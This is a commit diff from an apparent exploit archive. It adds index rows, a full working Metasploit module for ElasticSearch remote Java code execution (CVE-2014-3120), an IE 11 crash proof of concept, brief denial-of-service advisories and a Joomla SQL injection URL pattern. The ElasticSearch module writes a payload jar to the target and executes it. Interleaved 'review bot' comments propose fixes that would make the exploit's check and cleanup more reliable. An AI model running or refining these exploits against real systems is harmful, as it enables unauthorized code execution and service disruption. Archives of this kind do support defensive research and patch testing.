Updated 06_01_2014

Offensive Security 2014-06-01 04:36:38 +00:00
parent 65f378afeb
commit a6e4c23628
6 changed files with 279 additions and 0 deletions

@ -30221,6 +30221,7 @@ id,file,description,date,author,platform,type,port
33546,platforms/php/webapps/33546.txt,"Jokes Complete Website results.php searchingred Parameter XSS",2010-01-18,indoushka,php,webapps,0
33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 'misc.php' SQL Injection Vulnerability",2010-01-18,indoushka,php,webapps,0
33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1Multiple Cross Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0
33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' File NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-01-19,"Hellcode Research",linux,dos,0
33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0
33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
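Review bot: the added row 33549 files this OpenOffice '.slk' crash under platform `linux`, but the advisory it points to (platforms/linux/dos/33549.txt, in this same commit) describes a file-format NULL-pointer dereference in OpenOffice 3.1.0/3.1.1 with no operating-system restriction; the nearby cross-platform entry 33584 (IBM DB2) uses `multiple`, so either use that here or record why this one is Linux-only.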
@ -30254,3 +30255,7 @@ id,file,description,date,author,platform,type,port
33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component 'catid' Parameter SQL Injection Vulnerability",2010-01-31,snakespc,php,webapps,0
33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow Vulnerability",2009-12-31,"Francis Provencher",hardware,dos,0
33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0
33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x 64bit Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0
33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0
33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel h0wl Wylecial",windows,dos,0
33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200
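Review bot: the date in the new 33587 row (2014-05-30) does not match the `# Date: 29.05.2014` header inside platforms/windows/dos/33587.html added in this commit; pick one so the index and the file agree. The 33588 row's port 9200 does match the module's `Opt::RPORT(9200)` default, and 33585/33586 carry the SecurityFocus advisory dates, which is consistent with the rest of the file.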

platforms/java/remote/33588.rb Executable file
@ -0,0 +1,213 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in ElasticSearch,
exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
REST API, which requires no authentication or authorization, where the search
function allows dynamic scripts execution, and can be used for remote attackers
to execute arbitrary Java code. This module has been tested successfully on
ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
},
'Author' =>
[
'Alex Brasetvik', # Vulnerability discovery
'Bouke van der Bijl', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-3120'],
['OSVDB', '106949'],
['EDB', '33370'],
['URL', 'http://bouk.co/blog/elasticsearch-rce/'],
['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'ElasticSearch 1.1.1 / Automatic', { } ]
],
'DisclosureDate' => 'Dec 09 2013',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9200),
OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]),
OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ])
], self.class)
end
def check
result = Exploit::CheckCode::Safe
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
result
end
def exploit
print_status("#{peer} - Trying to execute arbitrary Java..")
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
end
print_status("#{peer} - Asking remote OS...")
res = execute(java_os)
result = parse_result(res)
if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...")
else
print_good("#{peer} - OS #{result} found")
end
jar_file = ""
if result =~ /win/i
print_status("#{peer} - Asking TEMP path")
res = execute(java_tmp_dir)
result = parse_result(res)
if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...")
else
print_good("#{peer} - TEMP path found on #{result}")
end
jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
else
jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar")
end
register_file_for_cleanup(jar_file)
execute(java_payload(jar_file))
end
def vulnerable?
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
java = java_sum([addend_one, addend_two])
res = execute(java)
result = parse_result(res)
if result.nil?
return false
else
result.to_i == sum
end
end
def parse_result(res)
unless res && res.code == 200 && res.body
return nil
end
begin
json = JSON.parse(res.body.to_s)
rescue JSON::ParserError
return nil
end
begin
result = json['hits']['hits'][0]['fields']['msf_result'][0]
rescue
return nil
end
result
end
def java_sum(summands)
source = <<-EOF
#{summands.join(" + ")}
EOF
source
end
def to_java_byte_array(str)
buff = "byte[] buf = new byte[#{str.length}];\n"
i = 0
str.unpack('C*').each do |c|
buff << "buf[#{i}] = #{c};\n"
i = i + 1
end
buff
end
def java_os
"System.getProperty(\"os.name\")"
end
def java_tmp_dir
"System.getProperty(\"java.io.tmpdir\");"
end
def java_payload(file_name)
source = <<-EOF
import java.io.*;
import java.lang.*;
import java.net.*;
#{to_java_byte_array(payload.encoded_jar.pack)}
File f = new File('#{file_name.gsub(/\\/, "/")}');
FileOutputStream fs = new FileOutputStream(f);
bs = new BufferedOutputStream(fs);
bs.write(buf);
bs.close();
bs = null;
URL u = f.toURI().toURL();
URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});
Class c = cl.loadClass('metasploit.Payload');
c.main(null);
EOF
source
end
def execute(java)
payload = {
"size" => 1,
"query" => {
"filtered" => {
"query" => {
"match_all" => {}
}
}
},
"script_fields" => {
"msf_result" => {
"script" => java
}
}
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "_search"),
'method' => 'POST',
'data' => JSON.generate(payload)
})
return res
end
end
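Review bot: `check` returns `Exploit::CheckCode::Safe` whenever `vulnerable?` is false, but `vulnerable?` also returns false when `parse_result` yields nil, i.e. on a non-200 response, an unparseable body, or an unexpected JSON shape; those cases prove nothing about the target and should map to `CheckCode::Unknown`, with `Safe` reserved for a 200 response whose `msf_result` is present but does not equal the expected sum. Two smaller points: the Windows branch in `exploit` builds `jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"` and so relies on `java.io.tmpdir` ending in a path separator (append one when it is missing, as `File.join` does for the *nix branch, otherwise `register_file_for_cleanup` is given a path that was never written), and the header comment's download URL `http//metasploit.com/download` is missing its colon.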

platforms/linux/dos/33549.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37857/info
OpenOffice is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference.
Attackers can exploit this issue by enticing an unsuspecting victim to open a specially crafted '.slk' file.
Successful exploits will cause the application to crash, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
OpenOffice 3.1.0 and 3.1.1 are vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/33549.slk
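Review bot: the advisory's only artifact is an external link (http://www.exploit-db.com/sploits/33549.slk), and the crafted file itself is not among this commit's 6 changed files, so the repository copy of 33549 is not self-contained; either add the sample alongside the text or state in the file that the sample is hosted separately. The text also gives no credit line for "Hellcode Research", who appear only as the author in the index row.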

platforms/linux/dos/33585.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38027/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected kernel to crash, denying service to legitimate users.
Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.
NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled.
http://www.exploit-db.com/sploits/
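Review bot: the closing link `http://www.exploit-db.com/sploits/` has no file name, so the reference to the proof of concept is dangling and the entry carries nothing beyond the BID summary; add the intended file name or drop the line. The advisory also repeats only the SecurityFocus text and omits the reporter credited in the index row ("Mathias Krause") and any pointer to the kernel fix that landed before 2.6.33-rc6, which is the information a defender triaging this entry needs.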

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38033/info
The 'com_gambling' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid=10&gamblingEvent=[Exploit]
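Review bot: the advisory names no affected version of the `com_gambling` component and no fixed version, and the index row for 33586 is equally version-less, so a reader cannot tell whether a given install is in scope; add the component version the reporter tested (the index credits "md.r00t") or note that the version is unknown. The request line with the `[Exploit]` placeholder is fine as documentation of the injectable parameter.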

@ -0,0 +1,32 @@
<!--
# Exploit title: Microsoft Internet Explorer 11 - WeakMap Integer
divide-by-zero DoS
# Date: 29.05.2014
# Vulnerable version: 11
# Tested on: Windows 7/8
# Author: Pawel Wylecial
# http://h0wl.pl @h0wlu
-->
<html>
<script>
var a = [new WeakMap];
a.push(new WeakMap);
a[1].set(a[0], a[1]);
a[0].delete(a[0]);
</script>
</html>
<!--
(674.2408): Integer divide-by-zero - code c0000094 (!!! second chance !!!)
eax=0087e241 ebx=04598cc0 ecx=04598cc8 edx=00000000 esi=04598cc8
edi=041f1aa0
eip=668756f0 esp=05b4b8ac ebp=05b4b8bc iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010206
jscript9!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicObject,bool,RecyclerPointerComparer<Js::DynamicObject
const *>,1>::TryGetValueAndRemove+0x1f:
668756f0 f736 div eax,dword ptr [esi]
ds:002b:04598cc8=00000000
-->
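Review bot: the header records `Vulnerable version: 11` and `Tested on: Windows 7/8` but not the jscript9.dll file version or the patch level of the two test machines, which is what a defender needs to decide whether a given IE 11 build is affected by this DoS; please add it. The WinDbg excerpt is consistent with the title (the faulting instruction `div eax,dword ptr [esi]` in `JsUtil::WeaklyReferencedKeyDictionary<...>::TryGetValueAndRemove+0x1f` reads a zero divisor at `ds:002b:04598cc8=00000000`), so the crash classification as an integer divide-by-zero rather than memory corruption is supported by what is shown.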